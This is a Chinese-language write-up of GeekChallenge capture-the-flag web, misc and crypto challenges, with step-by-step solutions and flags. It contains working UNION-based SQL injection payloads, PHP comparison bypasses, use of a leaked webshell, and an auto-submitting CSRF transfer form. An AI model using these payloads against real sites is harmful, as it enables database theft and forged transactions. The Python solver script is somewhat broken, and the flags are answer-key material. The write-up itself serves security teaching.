GeekChallenge
字数 2436 2025-08-24 10:10:13
Web安全挑战赛解题指南
1. Web安全挑战
1.1 朋友的学妹
URL: http://49.234.224.119:7413/
解题步骤:
- 右键查看网页源码
- 找到flag值:
U1lDe0YxQF80c19oNExwZnVsbGxsbGx9 - 进行Base64解码得到flag:
SYC{F1@_4s_h4Lpfullllll}
1.2 EZwww
URL: http://47.100.46.169:3901/
解题步骤:
- 扫描发现
www.zip备份文件 - 下载解压后得到假flag:
SYC{th1s_1s_4_f4ke_fl4g} - 审计
index.php发现需要POST提交a=sycl0ver - 正确flag:
SYC{Backup_1s_4_good_h4bit_l0l}
1.3 刘壮的黑页
URL: http://106.54.75.217:8080/
解题步骤:
- 使用GET提交
admin=username - 使用POST提交
syclover=password - 得到flag:
SYC{d0_y0u_k0nw_GET?}
1.4 欢迎
URL: http://49.234.224.119:8000/
解题步骤:
- 使用Burp修改为POST请求
- 构造数组绕过SHA1比较:
roam1[]=1&roam2[]=2 - 发现
f1444aagggg.php文件 - 访问得到flag:
SYC{w31c0m3_t0_5yc_r0@m_php1}
1.5 EZgit
URL: http://47.100.46.169:3902/
解题步骤:
- 使用Git_Extract工具扫描
.git目录 - 得到flag:
SYC{I_l0ve_sycl0ver_l0l}
1.6 我是大黑客
URL: http://39.106.144.160:100/
解题步骤:
- 发现
liuzhuang.php.bak文件 - 使用蚁剑连接一句话木马
- 在根目录查找flag文件
- 得到flag:
SYC{1iuzHuang_yyd_G0d!}
1.7 ezbypass
URL: http://49.234.224.119:7417/
解题步骤:
- 构造数组绕过strcmp:
a[]=1&b=2 - 提交非数字变量
c=123a - 得到flag:
SYC{php_4s_so_funny}
1.8 带恶人六撞
URL: http://49.234.224.119:7415/
解题步骤:
- 手注步骤:
- 判断字段数:
?id=1' order by 4-- q - 判断回显点:
?id=-1' union select 1,2,3,4-- q - 查询数据库名:
?id=-1' union select 1,2,3,database()-- q - 查询表名:
?id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- q - 查询字段名:
?id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fllllag'-- q - 查询flag:
?id=-1' union select 1,2,3,group_concat(fllllllag) from fllllag-- q
- 判断字段数:
- 得到flag:
SYC{liuzhuang 4s @_G00d_m@n}
1.9 flagshop
URL: http://173.82.206.142:8005/index.php
解题步骤:
- 使用admin/admin登录
- 构造CSRF攻击脚本:
<form action="http://173.82.206.142:8005/transfer.php" method="POST">
<input type="hidden" name="target" value="re1wn"/>
<input type="hidden" name="money" value="100000000000000000000000000000"/>
<input type="hidden" name="messages" value="nihao"/>
</form>
<script>document.forms[0].submit();</script>
- 提交报告让管理员访问
- 得到flag:
SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}
1.10 忏悔的刘壮
URL: http://120.79.197.4:5000/do_answer
解题步骤:
- 编写爬虫脚本利用cookie中的答案:
import requests
def request_func(req):
request_n = request.post("http://120.79.197.4:5000/check", data=req.cookies)
print(request_n.text)
return request_n
request = requests.session()
req = request.get("http://120.79.197.4:5000/")
req2 = request.post("http://120.79.197.4:5000/check", data=req.cookies)
print(req2.text)
need_req = request_func(req2)
i = 0
while i < 20:
i += 1
need_req = request_func(need_req)
- 得到flag:
SYC{this_is_your_flag}
2. 杂项(Misc)
2.1 壮言壮语
解题步骤:
- 使用佛文解密网站(http://www.keyfc.net/bbs/tools/tudoucode.aspx)
- 解码得到flag:
SYC{i_l0ve_Japanese_wife}
3. 密码学(Crypto)
3.1 铠甲与萨满
解题步骤:
- 使用凯撒密码解密(https://www.atoolbox.net/Tool.php?Id=778)
- 解密两次得到flag:
SYC{liuzhuangliuzhuang_bangbangbang}
关键知识点总结
- 源码审计: 查看网页源码是基础但重要的第一步
- 敏感文件泄露: 备份文件(.zip, .bak)、版本控制文件(.git)
- HTTP方法: GET/POST请求的区别与利用
- PHP特性:
- 数组绕过SHA1比较
- strcmp函数特性
- 弱类型比较
- SQL注入: 联合查询获取数据库信息
- CSRF攻击: 构造恶意表单诱导管理员操作
- 自动化脚本: 使用Python编写爬虫自动化操作
- 密码学: 凯撒密码、佛文编码等古典密码
工具推荐
- Burp Suite: 抓包改包工具
- Git_Extract: .git目录泄露利用工具
- 蚁剑: 网站管理工具
- Python requests库: 编写自动化脚本
- 在线解密网站: 佛文、凯撒密码等